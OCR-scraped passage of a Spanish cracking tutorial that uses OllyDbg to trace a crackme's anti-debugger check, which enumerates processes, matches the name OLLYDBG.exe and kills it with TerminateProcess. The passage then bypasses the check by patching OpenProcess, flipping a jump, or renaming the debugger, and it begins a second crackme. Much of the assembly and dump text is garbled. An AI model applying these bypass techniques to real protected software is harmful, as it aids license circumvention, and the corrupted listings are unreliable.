Add comment at76BB3A9A  [X] 
>] 
Cancel 


Add commenf at 7/6BB3A9A 


EnumProcessed 


68 CESBBBT6 
ES SBDBFFFF 
BE_00300000 
8975 E4 


(X] 


7 


Cancel | 


PUSH 1C 
PUSH PSAPI.76BB38C8 
CALL _PSAPI.76BB1601 


MOU ESI,S0Ba 
MOU DWORD PTR SS: [EBP-1C],ESI 


mMOU O PTR DS: [<8KERNEL32.LocalA|kernel32.LocalAl loc 
PUSH O 


PA AAA TA AA PA 


Esto lo realizo en todas las apis que el programa va cargando y veo sospechosas cuando le pongo un 
BPX cosa de que cuando pare, sepa que api era, pues el OLLYDBG no me aclarara nada al no ser una api 


de las de la lista. 


Si busco en el WINAPIS32 esta api no figura, por lo tanto busco en GOOGLE 


m— - 


S enumprocesses 


— 


Y Oc 


Y en la pagina de Microsoft normalmente se encuentran, es este caso la pagina es 


http://msdn.microsoft.com/library/default.asp?url=/library/en-us/perfmon/base/enumprocesses.asp 


A 


PA a 


Y € 5 »p S a Y 2 http://msdn. microsoft.com/library/default.asp?url=/library y US [Gl enumprocesses 


Search for 


CCT ES 


Advanced Search 
UTE toc q 


[El Up One Level 

Fl EmptyWorkingSet 

N EnumDeviceDrivers 

Fl EnumPageFiles 

Fl EnumPageFilesProc 

Fl EnumProcesses 

Fl EnumProcessModules 
Fl GetDeviceDriverBaseNa 
Fl GetDeviceDriverFileNarr 
Fl GetMappedFileMame 
F GetModuleBaseName 
N GetModuleFileNameEx 
Fl GetModuleInformation 
Fl GetPerformanceInfo 

Fl GetProcessImageFileNz 
Fl GetProcessMemoryInfo 
Fl GetwsChanges 

Fl InitializeProcessForWsv 
Fl QueryWorkingSet 

Fl QueryWorkingSetEx 


The EnumProcesses function retrieves the process identifier for each process object 
the system. 


BOOL EnumProcesses ( 
DWORD * pProcesslids , 
DWORD cb, 

DWORD + pBytesketurned 


y: 
Parameters 


pErocessids 


[out] Pointer to an array that receives the list of process identifiers . 
cb 

[in] Size of the plrocessids array, in bytes. 
pBytesReturned 

[out] Number of bytes returned in the pProcessids array. 


Return Values 


Tf the function succeeds, the return value is nonzero. 


Bueno aquí dice que la susodicha api, nos devolverá el PROCESS IDENTIFIER o PID de cada proceso 
que esta corriendo, pues bien veamos antes que es el PID ese, jeje. 


Cada proceso que corre esta identificado con un número que varia cada vez que se arranca un proceso, si 
vemos en la lista de procesos 


Ea! 


E Administrador de tareas de Windows 
Archivo Opciones Yer Apagar Ayuda 


A | Aplicaciones | Procesos | Rendimiento | Funciones de red | Usuarios 


Nombre de imagen Leo Deniro deus... CPU Usode... A 
jusched.exe 88 Ricardo 00 1.432 KB 
vmware-authd.exe 1216 SYSTEM 00 2,672 KB 
swchost,exe 1140 Servicio de red 00 3.008 KB 
swchost,exe 1084 SYSTEM 00 3.068 KB 
explorer.exe 992 Ricardo 00 9.544 KB 
lsass,exe 924 SYSTEM DO 1,080 KB 
services.exe 912 SYSTEM 00 3,454 KB 
winlogon.exe 868 SYSTEM 00 424 KB 
Csrss.exe 344 SYSTEM 00 3,464 KB 
smss.exe 8, SYSTEM 00 272 KB 
OLLYDBG.EXE 724 Ricardo ñ 4 
NETFileServerEngine.exe ad SYSTEM 02 7.480 KB 
spoolsy,exe 492 SYSTEM D0 3.792 KB 


Vemos que el OLLYDBG en este caso tiene un PID de 724 decimal ya que esta utilidad trabaja con 
números decimales, pero bueno si queremos saber el PID del OLLYDBG en hexa con la calculadora de 
Windows. 


E Calculadora 
Edición Wer Ayuda 


| O : 724, | 


OhHez (Dec O0ct OBin (2) Sexagesimal Ó) Radián O) Centesimal 


A 
E 10d Y DOdOy 


Apreto el boton hex para pasar a HEXA 


F Calculadora 
Edición Yer Ayuda 


| 


OHez ODec O0ct OBin ( Oword ODwod ÓOwWod  Ó Byte 


E 90 8 baaa 


2D4 será el PID del OLLYDBG, pueden verificar que si lo cierran al OLLYDBG y lo vuelven a abrir el 
PID variara, pues cada proceso al reiniciarse recibirá otro PID. 


Tampoco tendremos la suerte en este caso de que OLLYDBG nos muestre los parámetros de la api pues 
para OLLYDBG no existe la misma. 


Sabemos por la pagina de Microsoft que los tres parámetros son estos 


pProcessids 
[out] Pointer to an array that receives the list of process identifiers . 


[in] Size of the plrocessids array, in bytes. 
pBytesReturned 
[out] Number of bytes rotunda in the pProcessids array. 


O sea que en 12eDe4 guardara la lista de PIDs de todos los procesos que corren en mi maquina, hagamos 
execute till return para llegar al ret de la api y ver en el dump si los guarda alli. 


A 
0012EE9C|3C BD? 
0012€EEA4/30 09 00 66 66 4D 3C 0u 
0012EERC| 48 60 00 60 61 BOB 00 BA|H...B.. 
0012£EB4/56C 00 00 660 EE 63 02 BA|....6 
0012EEBC|S0 04 30 66 66 40 30 6u 
0012EEC4/560 00 00 66 67 B4 D4 77 
OB12EECC| AD 01 3C 00 FF FF FF FF|ab< 
0012€EED4|2A 33 Di 77 66 BO 00 00] +*e 
0012EE0C/00 00 00 00/24 51 46 BA|.. 
AR12FFF4123A AR AA AA!LTE AR AA ARLA 


Ahí esta la lista de PIDs y esta el de mi OLLYDBG snif, snif 


Pongo un BPM ON ACCESS allí para ver cuando lo usa, veamos 


0012£E74| 84 6A 0a 69 59 BA Ba aa d-..P... 
OB12EE7C|58 98 BO BB SA BD BA BB|-M..C... 
0012EE34 |D4082 

OBÍ2EESC|DS 65 BB Backup » 
OG12EE94| AB BE BB 
OBÍ2EE9C|3C M7 BB Copy 
O012EER4|38 89 BO 
OBÍ2EERC|48 BA BB 
O012EEB4|8C BA BB 
OB12EEEC| 88 M4 230 EA 
OD12EEC4 08 Ba AB Memory, on acc 


BB12EECC|AB B1 3C z 
0B12EED4|2A 88 Di Search for Mermorw. on write 


Binary 


Ahora si doy RUN 


e ESP,8 
U ECX,DWORD_PTR SS: [EBP-1C 


1 
FEBAGO. FCEFF! PUSH DWORD PTR SS: [EBP+ECX*4-1004] ProcessId = 2D4 
USH A ISS itable = FALSE 
PUSH 416 Access = UM_READ: QUERY_ INFORMATION 
OpenProcess 


MOU DWORD PTR SS: [EBP-24],EAX 
CMP_ DWORD PTR SS: [EBP-24],0 


604581052 


Vemos que para allí y va a usar la api OpenProcess que verifica si un proceso esta corriendo, y si esta 
corriendo te devuelve su handle o manejador. 


Que diferencia hay entre el PID y el handle, muy sencillo, el PID es un identificador genérico, en toda tu 
maquina, en cualquier proceso el PID del OLLYDBG será el mismo mientras no se reinicie, en mi caso 
será 2d4, ahora el handle, como su nombre lo indica es un manejador, o sea que es un numero que te 
devuelve el sistema para que tu programa pueda manejar ese proceso, y el numero puede variar para cada 
programa, es como una solicitud para controlarlo, si no la pedís no tendrás el numerito y no lo podrás 
controlar, si lo pedís el sistema te devolverá el manejador y lo podrás manejar y hacerle guarradas jeje. 


Veamos mas detalladamente la definición de OpenProcess en el WinApis32, la misma tiene muchos 
parámetros pero lo que nos interesa es esto. 


Return Values 
Ifthe function succeeds, the return value is an open handle ofthe specified process. 


Ifthe function fails, the return value is NULL. To get extended error information, call Getl astError. 


O sea devolverá el manejador del proceso que esta corriendo, en resumidas cuentas es lo que el programa 
quiere saber en este caso. 


Traceemos con f8 hasta pasar la api 


Cx BB12E7AC 
; (C91EB94 ntdll.K 


 (S 


004664ñ0 Daxx 
' BOA4B1IDAF Da 
ES 


DON 
Di ( 


Y en EAX devuelve el handle o manejador del OLLYDBG que en mi caso es 58. 


El mismo OLLYDBG nos muestra los HANDLES con los cuales esta trabajando el programa en la 
ventana H. 


FIA ANS ES RA O SA SS O O TT 


Handle _|T: Refs Access |T | Info Name 
000090028 Desktop 3753. | 000FD1FF | ¡Def au |t 
00009008 Directory | 82. | 00090093| MnownDl ls 
000009014 Directory 50. 000FODOF Windows 
00000034 Directory 473. 00B2009F BaseÑamedObjects 
099000920 | Event 3. |001F0003 
0000993C | Event 2. 001F0003 
00009949 Event 2. 001F0003 
00009044 Event 2. | 001F0003 
000909048 Event 2. | 001F0003 
000009030 File (dev) | 2. 00100001 [MDevicerKsecDD A S Ñ , 
1M000900C|File (dir) 2. 00100020 c:Mocunents and SettingsRicardoWEsocritoriowDaXXoR_ 
00009019 Key 2. 0OBFDBSF HKEY_LOCAL_MACHINE 
00009038 Key 2. 000FDOSF HKEV_CURRENT_USER 
00000004 KeyedEvent 48. 000F0093' xKernelObjectsCritSec0utOfMemoryEvent 
000900018 Port 3. 001F0001 
00099 2. 001F0001 
90009: | 66. 00990419 

y0n otion 47.|000FO001F 
009009959 | Seot ¡on | 27. | 00990094 
00009024 WindowStat ion 88. 900FO37F Mindows WindowStat ¡onsWinStad 
298009920 WindowStation | 88. |0090FO37F Ñ ¡MindowsWindowStat ionsWiinStad 

| 


Vemos que allí aparece el 58 y el TYPE o tipo es PROCESS o PROCESO, así que el programa maneja el 
handle 58 que pertenece a un proceso en este caso al OLLYDBG. 


Si otro proceso usara EnumProcess para hallar el PID en este momento seria el mismo 2d4 mientras no se 
termine el proceso OLLYDBG, ahora si pide al sistema un handle o manejador para dicho proceso, será 
cualquier otro numero pues, los handles son particulares de cada proceso. 


En este caso el peligro para nuestro OLLYDBG es que el programa ya tiene un manejador, con ello puede 
hacer lo que quiere, lo que si aun no sabe que pertenece a OLLYDBG solo que es un proceso y que esta 
corriendo, ahora debe verificar el nombre del mismo para determinar si este proceso es OLLYDBG, 
obviamente esto lo realiza con cada PID que obtiene de la lista de procesos, nosotros salteamos todos y 
llegamos hasta cuando trabaja con el OLLYDBG al haber puesto un BPM ON ACCESS en su PID. 


Continuemos traceando con f8 


. QU» Lu LEM EUA») DWORD Tin 225 LEDTA"UJ 

. PUSH EDX 

" FF?5 DC PUSH DWORD PTR SS: CEBP-24] 

. FFSS B4 CALL DWORD _PTR SS: [EBP-4C] PSAPI.EnumProcessModu les 
12 . 8500 TEST EAX, EAX 


alada 


74 18 
. 63 640160000 || PUSH_104 
-« 38D3D FSEEFFFI] LEA ECX, DWORD PTR SS: [EBP-1108] 


ñ 


Vemos que allí llega a la otra api que nos quiso ocultar en este caso EnumProcessModules, en la misma 
pagina de MICROSOFT vemos el detalle de esta api. 


Search for 


MSDN Lbray wo 


TAPETE Platform SDK: Performance Monitoring 


sunc toc qe x 

mua - EnumProcessModules 
Fl EmptyWorkingSet 
Fl EnumDeviceDrivers 


Fl EnumPagerFiles The EnumProcessModules function retrieves a handle for each module in the specified 
FA EnumPageFilesProc 

FM EnumProcesses process. 

Bl 

Fl GetDeviceDriverBaseNa 

F GetDeviceDriverFileNarr BO0L EnumProcessModules ( 
Fl GetMappedFileName HANDLE hProcess, 

Fl GetModuleBaseName HMODULEA 1phModa1 

Fl GetModuleFileNameEx PañÑOQRie, 

Fl GetModuleInformation DWORD cb, 

Fl GetPerformanceInfo LPDWORD 2pcbNeeded 

Fl GetProcessImageFileNz y: 


Fl GetProcessMemoryInfo 
Fl GetwsChanges 


Fl InitializeProcessForWsv Parameters 
Fl QueryWorkingSet 
Fl QueryWorkingSetEx hBrocess 
[in] Handle to the process. 
iphModule 


[out] Pointer to the array that receives the list of module handles. 
cb 
[in] Size of the jphModule array, in bytes. 
ipcbNeeded 
[out] Number of bytes required to store all module handles in the ¿phaModule array. 


Return Values 


Tf the function succeeds, the return value is nonzero, 


O sea que ahora va a buscar de este proceso que esta investigando, la lista de handles de los módulos que 
usa, lleguemos con f7 hasta la api. 


dd fic cal A A ia) $ ) 1) Sy) 9 $9 75) OE y y mm 


62 33000000 PUSH 88 EnunmProcessModu les 


638 SSZ20BR76 PUSH PSAPI.76BB20583 

ES _DEFEÉFFFF 

33DB XOR EBX,EBX 

53 PUSH EBX 

6A 18 PUSH_ 18 

8D45 BS LEA EAX, DWORD PTR SS: [EBP-48] 
50 PUSH EAX 

E2 PLISH FRY 


En el stack vemos los parámetros 


90451D068| RETURN to DaxxXoR. 004010685 


Según nuestro amigo HILL los handles de cada modulo se guardaran allí, vemos justo arriba el 58 
perteneciente al handle del proceso OLLYDBG que es el parámetro superior. 


Aquí hay una cosita que aclarar, cuando pedimos handle de los módulos el sistema nos devuelve la 
dirección base o donde comienza dicho proceso en la memoria, en este caso nos devuelve 400000 ya que 
el proceso OLLYDBG comienza allí. 


[Address [Hex dump____________ Jascir_ | 
6612FD! 40 66 61 060 66 00/..B.B... 
Prod. 
..TU-+ 
DEW 


12FDDO 
12FOMA1 + 


”M 


FSEEFFFI[ LEA ECX,DWORD PTR SS: [EBP-1108] 
PUSH ECx 


5 CO PUSH DWORD PTR SS: [EBP-40] 
75 DI PUSH DWORD PTR SS: [EBP-24] 


Bo CALL DWORD PTR SS: CEBP-50] PSAPI.GetModu leBaseÑameA 

C4 MOU DWORD _PTR SS: LEBP-230],EAX 

no DUICaA Minha DTD Sc. TEDD FAT PL M0 iamt 
GetModuleBaseNameA 


GetModuleBaseName 


TheGetModuleBaseName functionretrievesthe base name ofthe specifiedmodule. 


DWORD GetHoduleBaseMame [ 
HANDLE RProcess, 
HHODULE RNodwle, 
LPTSTR lpBrseÑame , 
DWORD nize 

Y: 


Parameters 


hProcess 
[in] Handleto the processthat containsthe module, Ifthis parameteris NULL GetModuleBaseName uses the current 
process 
The handle must have the PROCESSQUERYINFORMATICANd PROCESSYM READaccessrights For more information see 


ProcessSecurityand AccesKights 

hModule 
[in] Handleto the module, Ifthisparameteris NULL thisfunctionreturns the name ofthe fileused to createthe calling 
process 

loBaselarme 
[out] Pointerto the buffer that receivesthe base name ofthe module, Ifthe base name is longerthan maximumnumber of 
charactersspecifiedby the Size parameter, the base nameis truncated 

nSize 
[in] Size ofthe ¿oBaseWame buffer, in characters De 

Retum Yalues 


Tfthe functionsucceeds the return value specifiesthe length ofthe stringcopiedto the buffer, in characters 


Ifthe functionfails the return valueis zero, To get extended errorinformation callGeti astError. 


O sea que con esto quiere hallar el nombre del modulo, ya que esta api, en el parámetro IpBaseName, 
abre un buffer para guardar el nombre del modulo que corresponde a esa base que averiguo antes, veamos 
lleguemos hasta la api. 


| 
Ll 
1/E/m/T]wH/c]/]k]B/R]+-]s] 33) 


GetModu lebaseÑñameA 


PUSH_ESI 
MOU ESI,DWORD PTR SS: [EBP+14] 
LEA EAX, DWORD PTR DS: [ESI+ESI] 
PUSH_EAX 


kernel32.LocalAl loc 
CMP EAX, EBX 
MOU OWORO PTR SS: [EBP+14],EAXx 


El 58 que es el handle del OLLYDBG, el 400000 que es la base del modulo principal, y el buffer estará 
guardado en 12ECEO, asi que veamos esa zona en el dump. 


Jeje ya tiene ahora que llega hasta el RET el nombre del proceso y realiza esto con cada uno de los 
procesos que corren en tu maquina, pues ahora comparara el nombre a ver si es OLLYDBG.exe si en este 
caso hubiera sido OPERA.EXE por ejemplo, pues lo dejara tranquilo seguramente jeje. 


00401D7B DC PUSH DWORD PTR SS: CEBP-24] 
6646107E ; BB 
00401081 > 04 MOU DWORD PTR SS: [EBP-3C],EAX 
pn401034|| > 75 DC PUSH DWORD PTR SS: CEBP-24] hObject 
2 ES EG2E0600 || CALL _<JMP.2KERNEL32.CloseHandle> CloseHandle 
DS . 280835 F4EDFFFI] LEA EAX, DWORD PTR SS: [TEBP-120C] 


Ahora llega a CloseHandle donde cierra el manejador o sea que el 58 desaparecerá de la lista de handles. 


[53] ru VI LED Pag ro APLI o VU AI nep 


mex] e ju] ved sit] +] +] 1/ejmt[wju]c//]x]B[r]--Js] ¿3 


Handle | Type Refs |Access |T | Info Name 

B0UBBBZS| Desktop OBUFO1FF Def au lt 

0009098 | Directory 1551515115100) sKnownDl ls 

60000014 Directory 1. | BOBFOMaF sl indows 
Directory ABaseNamedObjects 

Event 3 

Event . 

00000040| Event . |[DO1FODOS 

00000044 | Event 001F0003 

00000048 | Event 001FO0003 

000090030 File (dev) . (001900001 MevicerKsecDD 

File (dir) . |[OB10002O ciDocuments and Settinas»Ricardo“EscritoriowDaxXxXoR_ 

Key DOBFGBSF HKEV_LOCAL_MACHINE 

8| Key 2. | OOBFOBSF HKEWY_CURRENT_USER 

KeyedEvent . qe MernelObjectsCritSecdutOfMemoryEvent 

t . 


FE 


0009024 | WindowStat ¡on : BF MiindowsWindowStat ionsWinStad 
B0B0BB2C | WindowStat ¡on + | OBOFO3S7?F MiindowssWindowStationsWinStad 


Pues si, por ahora no podrá hacerle trastadas pues no tiene el handle abierto, pero no nos confiemos 
sigamos adelante. 


8085 F4EDFFF LEA, ER: DWORD PTR SS: [EBP-1200] 

S FSEEFFFI| LEA EDX, DWORD PTR SS: [EBP-1108] 

> PUSH EDX Argl 

2 21806500 || CALL_DaXXoR. BB45DACA DaXXoR. 0045DACA 
POP ECX 

PUSH EAX 


ADD_ESP,S 
TEST_EAXx, EAX 


46 


LO AUN CHA, HA 
[55] MOU AL,BYTE PTR DS: [EBX] 
] PUSH EAX (E 
10000000 || CALL DaRXOR.B045DRAE4 DaXxXoR. 00450AE4 


POP ECx 
MOU_ BYTE PTR DS: [EBX],AL 
TEST EAS 


05045DAD1 
45DAD2 


Allí lee la primera letra de OLLYDBG (4F) y la pone en el stack con PUSH y entra a otro CALL 
entremos también. 


Vemos que en este call no realiza nada demasiado importante salimos y llegamos al segundo. 


POP ECX 
PUSH EAX 


ADD_ESP,8 
TEST_EAXx, EAX 
MOU DWORD PTR SS: [EBP-26],1 


Mm EPSV ninobn DTD Sc. TEDD15 1 


MOV ECX, DWORD PTR SS: [ESP+4] 
MOV EDX, DWORD PTR SS: [ESP+8] 
PUSH_EBX 


XOR EAX, EAX 
X0OR EBX,EBX 
MOU AL,BYTE PTR DS: [ECXJ 
MOU BL,BYTE PTR DS: [EDXJ 
SUB EAX, EBX 


TEST BL,BL 


MOU AL,BYTE PTR DS: [ECX+1] 
MOU BL,BYTE PTR DS: [EDxX+1] 
SUB EAX, EBX 


TEST BL,BL 


MOU AL,BYTE PTR DS: [ECX+2] 
MOU BL,BYTE PTR DS: [EDX+2] 
SUB EAX, EBX 


TEST BL,BL 


MOU AL,BYTE PTR DS: [EC%+3] 
MOU BL,BYTE PTR DS: [EDx+3] 
SUB EAX, EBX 


ADD ECXx,4 
ADD_EDX, 4 


TEST ob 


POP EBX 
RETN 


DODODOO 


Ahh acá si esta comparando el nombre del proceso que obtuvo, con el nombre OLLYDBG.exe y si son 


' BBASBARS 
CO ES 002 


"OLLYDEG. 
"OLLYDBG. 


Lt: OLFFFFFFFF) 


iguales ir a a kaput, jeje en este caso eran iguales veremos que hace, lleguemos al RET 


Allí si no son iguales, EAX será diferente de cero y saltara y no pasara nada pero si EAX es igual a cero 


DOD 
DDc: 
DEN 

I 
mie 
vom 
TUD: 
AX 
co 


| 
m 
19] 
fué” 
m 
D 
x 
m 
D 
Xx 


MOU DWORD PTR SS: [EBP-26],1 
MOU ECX,DWORD_PTR SS: [EBP-1CJ 
BUEN DIDRD PTR SS: [EBP+ECx*4-1004] 


PUSH 1 


MOU DWORD PTR SS: LEBP-24],ERXx 
CMP_DWORD_PTR SS: [EBP-241,0 


PUSH DUORO PTR SS: [EBP-24] 


pa 
m 
un 
pul 
m 
D 
x 
m 
D 
x 


PUSH DWORD PTR SS: [EBP-24] 
PUSH DWORD PTR SS: [EBP-30] 


Xx 
o 
pra) 
m 
D 
Xx 
m 
D 
X 


PUSH DWORD PTR SS: [EBP-24] 
PUSH DWORD PTR SS: [EBP-30] 


z 
o 
== 
m 
D 
Xx 
10 
un 
D 


PUSH DWORD PTR SS: [EBP-30] 


z 
o 
Z 
m 
D 
Xx 
ru 
un 
o 
. 


INC DWORD _PTR SS: [EBP-1C] 


como en nuestro caso. 


"A 00 
ID Dn 


[ 


[ 
[ 


TerminateProcess 


hObject 
CloseHandle 
hL ibiodu le 
FreeLibrary 


hObject 
CloseHandle 
hLibiModu le 
FreeLibrary 


hLibiModu le 
FreeLibrary 


FALSE 


ATE 


A A 
MOU ECX, DWORD _PTR SS: [EBP-1C] 
PUSH DWORD PTR SS: [EBP+ECX*4-1004] q 
PUSH O E 
PUSH 1 


MOU DWORD PTR SS: SOY US 
FMP AHARA PTR SS: PFRP-241 


MA 


Access = TERMINATE 
Inheritable = FALSE 
Proc ¿Id = 2D4 


ME 


Si ejecuto con f8 


bc as [|| CMP DWORD PTR SS: C[EBP-241,8 


DUO 


PUSH A 7 
PUSH DWORD PTR SS: [EBP-24] [ s 
TerminateProcess 


TEST _EAx, EAX 


Como vemos llega a la api TerminateProcess auxilio esta por morir mi OLLYDBG a la cual le pasa el 
handle 58. 


hProcess = BBBBBBSS (window) 


— e E EFFES loa /9151515 Ex itCode = 4 


Y al apretar f8, adiós OLLYDBG se cerro todo, con eso investigamos como funciona la detección por 
nombre. 


Bueno ya me canse lo haremos un poco a lo maton jeje, reinicio el OLLYDBG y pongo un BP en 
OpenProcess 


Es ra YI vYY LILIA y Ag > dl dl > VU IA YY U — 


MOU EBP,ESP 
SUB ESP, 26 
MOV EAX, DWORD PTR SS: [EBP+10] 
MOU DWORD PTR SS: [EBP-8],EAXx 
MOV EAX, DWORD PTR SS: LEBP+CI 
PUSH _ESI 
XOR ESI,ESI 
NEG EAX 
SBB EAX, EAX 
AND EAX, 2 
MOU DWORD PTR SS: [EBP-14],EAXx 
Fa LEA EAX, DWORD PTR SS: [EBP-8] 
PUSH_EAX 
LEA EAX, DWORD PTR SS: [EBP-26] 
PUSH EAX 
PUSH_DWORD_PTR_SS: [EBP+8] 

EAX, DWORD PTR SS: [EBP+16] 


SS: [EBP-4],ESI 
SS: [EBP-20],18 
DWORD PTR SS: [EBP-1CJ,ESI 
DWORD PTR SS: CEBP-18],ESI 
DWORD PTR SS: CEBP-107,ESI 
DWORD_PTR_SS: [EBP-C],ESI 


ntdll.Z2wOpenProcess 
ESI 

JL kerne132.7C838BC6 
MOU EAX, DWORD PTR SS: [EBP+10] 
LEAVE 


PUSH _EAX 


Allí para, si modifico la api para que siempre devuelva cero, el programa pensara que no hay procesos 
corriendo y no tendrá el handle de ninguno para cerrar, podemos cambiar las ultimas líneas de la api. 


CMP EAX,ESI 
15 ESI 


'B 


ntdll.Z2wOpenProcess 


P 
XOR _EAX, EAX 


PILISH FOsw A 


a a a a a da dd 


Con eso, la api siempre devolverá cero quitemos todos los Bps, y debemos ya que el programa genera 
muchas excepciones y aun no hemos visto el tema excepciones, para que corra poner las tildes en 
DEBUGGING OPTIONS- EXCEPTION de esta forma. 


ES Debugging options 


Commands | Disasm | cpu | Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 Il 
Security | Debug | Events Exceptions | Trace | SEX | Strings | Addresses | 


4 Ignore memory access violations in KERNEL32 


Ignore (pass to program] following exceptions: 
INTI breaks 
Single-step break 
Memory access violation 
Integer division by O 
Invalid or privileged instruction 
All FPU exceptions 


Ignore also following custom exceptions or ranges: 


Add range 
Delete selection 


Undo Cancel | 


Por ahora coloquen las tildes de esta forma para que el programa salte solo las excepciones ya que son 
muchísimas y vivirán haciendo SHIFT +f9 para pasarlas, de esta forma las que están tildadas las pasara 
automático el OLLYDBG sin parar, demos RUN. 


Fi Crack... Ea )BX] 


Y si así corre perfectamente, pero también podemos hacer lo siguiente: 


8304 us ADD_ESP,S 
8500 TEST _EAX,EAX 


75 74 
C745 Eb 61001] MOV DWORD PTR SS: [EBP-207,1 
8B4D E4 MOU ECX, DWORD _PTR SS: [EBP-1C] 
FFB48D FCEFFI] PUSH DWORD PTR SS: [EBP+ECx*4-1004] 'TrOocess 
5A 4b PUSH O 

PUSH 1 Access = TERMINATE 


OpenProcess 
MOL MMINAN PTR SS: TFRP-241 FOY 


5A al 
Es 313006008 
2942 nF 


Cambiemos el JNZ por JMP, así evitamos la protección 


El programa arranca y muestra la ventana veamos que pasa cuando apreto TRY 


E Crack... EJ px] 


[D ecryption key 


Sale el cartel de error perfectamente eso quiere decir que la protección ANTIDEBUGGER ha sido 
vencida. 


De cualquier manera esto no es lo que se hace habitualmente para vencer esta protección, simplemente 
copiando el ejecutable OLLYDBG.exe a otra carpeta y cambiándole el nombre por ejemplo a 
PIRULO.exe y volviéndolo a su carpeta original, de forma que queden ambos el OLLYDBG.exe original 
y el PIRULO.exe y usando este ultimo, el programa al comparar nunca encontrara el nombre de ningún 
proceso llamado OLLYDBG, ya que ahora se llamara proceso PIRULO y con eso es vencida esta 
protección completamente, de cualquier forma creo que es bueno que sepan como funciona por eso la 
explicación. 


x 
Ye nomecae oltydbg.GID 
OllyDbg, 32-bit analysing debugger 333) | Archivo GID 
A AI j ñ O KB 
OLLYDBG.HLP E ollydbg. ini 
Y): Archivo je Ayuda Opciones de configuración 
O KB 
cren a EN 
) 3,204 KB OllyDbo.. 
Lo a y PSAPI.DLL y, rbx-crackmel0.udd 


Es importante recordar que aunque usemos un OLLYDBG renombrado, debemos dejar el original en la 
misma carpeta si no habrá problemas con los plugins. 


mE o | 
> +68 BEG24600 AD = "CreateToolhelp325napshot” 
1Modu Le 

GetProcAddress 


PUSH DWORD PTR SS: CEBP-30] 


MOU DWORD a SE AN EAX 
PUSH DaxxoR. Al 
PUSH DWORD PTA. ES Leep- 30] 


MOU DWORD PTR HU AaS lo ERAX 


FF?7S DO E 

Es B92E0600 

38945_AC 

PUSH DaxxoR. 0046: E cNameOrOrdinal = "Process32Next” 


E 
E 
[=] 
S 
Ss 
m 
1] 


ameOrOrdinal = "Process32F irst” 


FF7S DO 
ES A92E0600 de rrrcardórtas 
3945 AS 


PUSH DWORD PTR ES Lesp- 30] ¡Modu Le 


MOU DWORD Ea SE HERE EAX 
PUSH DaxxoR. Bl 
PUSH DWORD PTA. EST Lésp- 30] 


MOU DWORD a SEN ESE ERX 
PUSH DaxxoR. Bl 
PUSH DWORD Pre. ES LEsp- 30] 


FF?7S DO 
ES 9920600 jetProcAddress 
3945 A4 


" 


¡Mo du le 


h 
G 
cNameOrOrdinal = ”Module32F irst” 
4 
GetProcAddress 


FF7S DO 
ES 392E0600 
3945 AD 


| 


ame0rOrdinal = ”Module32Next" 


ule 
SetProcAddress 


FF7S DO 

ES 792E0600 
. 8295 9C MOU DWORD PTR SS: LEBP-64], E 
. 8370 A4 BO — |CMP DWORD PTR SS: [EBP-5C1, 


1ER 
AAA FOR 


Hay una parte que el programa posiblemente acceda cuando colocamos un serial bueno, que llama a 
nuevas apis para una detección diferente, dicha detección la veremos en próximas partes detalladamente. 


Hasta la próxima parte 21 
Ricardo Narvaja 

24 de diciembre de 2005 
FELIZ NAVIDAD 


INTRODUCCION AL CRACKING CON OLLYDBG parte 21 


Seguiremos ahondando sobre diferentes métodos antidebugging, hoy usaremos un crackme modificado 
por mí para la explicación. 


Es el crackme buggers3, al cual le hice algunos arreglos para poder explicar nuevamente la detección por 
nombre del proceso con otras apis, que trae este crackme, y además la detección por el nombre o clase de 
la ventana del OLLYDBG que también trae este crackme buggers3. 


Lo abrimos con el OLLYDBG original, no el renombrado, porque estudiaremos también una variante del 
método que vimos en el tutorial 20, por lo tanto necesitamos que el OLLYDBG se llame OLLYDB.exe 
para que sea pueda ser detectado y estudiar esa protección. 


Lo abrimos entonces en el OLLYDBG.exe, solo protegido por el HideDebugger 1.23f contra la detección 
por la api IsDebuggerPresent. 


Ek ea] visi slo] e] + ujejmrjwjn]c//]k/B|R]... s| 


5 8B4C24 24 MOU ECX, DWORD PTR SS: [ESP+24] kerne132. 2316058 


49 DEC _ECXx 
BFB7S1 30 MOUZX EDX,WORD_PTR DS: [ECX+3CJ 
3B4CHA 34 CMP ECX, DWORD PTR_DS: [EDX+ECX+34] 


MOU DWORD PTR DS: [403130], ECx 
Sl. PUSH ESI 
0u4a116 PUSH EDI 
aBa4B1B17| . PUSH_EBX 


NN 


Allí esta abierto, vemos que el plugin HideDebugger esta configurado 


Hide Debugger [Opti... 


Protect against: 


IsDebuggerPresent 
O Findwindow/EnumwWindows 
O TerminateProcess 


o 
o 


O Unhandled exception tricks 
O OutputDebugstring exploit 


O Detach 


Solo para proteger al OLLYDBG contra la detección por medio de la api IsDebuggerPresent, y además 
vemos en la lista de procesos que usamos el OLLYDBG original, pues el proceso se llama 
OLLYDBG.exe 


Archivo Opciones Yer Apagar Ayuda 


Aplicaciones | Procesos | Rendimiento | Funciones de red | Usuarios 


Nombre de imagen PID. Nombre deus... CPU. Usode ... A | 
taskmgr.exe 3128 Ricardo Do 4.640 KB 
2680 Ricardo 00 5,504 KB 
alg.exe 2648 SERVICIO LOCAL DO 1,260 KB 

| Miisamane mem MALA Mis=eda na O 70A VD | 


Bueno volvamos al buggers3 veamos las apis que utiliza en la lista de apis 


1314001 ! 


Follow in Dump » 
View call ree CtriK 


4 
3304001 | 


1314001 
E 


ja14001 


Find references to 
Wiew 


Í 
3 
Ú 
í 
: 
: 
Í 
Í 
t 
Í 


| Mames in buggers3 
[ todress [Section [tope [mane 


j Import 
$ 00401000| text Export ¿ Moda UNES Point > 


Glup, solo tiene en la lista la api ExitProcess, el resto las debería cargar con GetProcAddress, pero 
GetProcAddress si ni siquiera esta en la lista si intento. 


Command Bp GetProcAddress y| P 


Program entry point 


Veo que me la toma, pues nos evitamos mayores complicaciones, ahora si demos RUN. 


(kernel32 
"FreeL ¡or ary” 


2D 


Vemos las apis que va cargando, por supuesto si vemos alguna que nos interesa, llegamos al RET para 
ver la dirección de la misma, y le ponemos un BP EAX, ya que en EAX estará la dirección que devuelve 
GetProcAddress. 


En este caso no nos interesa, seguimos con F9 


6/] hModu le = 
ProcNameÚ 


Posolica [pros to TEO From, _buggers3. 60401123 


Am > 


ntdl 1.7092 


DODOO 
DONA 


ó 
a 
F 


FEFFFEP 


Para varias veces hasta que hallamos la primera sospechosa de homicidio, ustedes dirán como sabe, pues 
porque conozco esta protección, y por eso se las enseño, para que conozcan cuales son las apis que se 
pueden utilizar tanto en la versión del tute 20, como en esta diferente versión de la protección. 


Bueno hago EXECUTE TILL RETURN para llegar al RET 


Window Help 


Run FO [| 
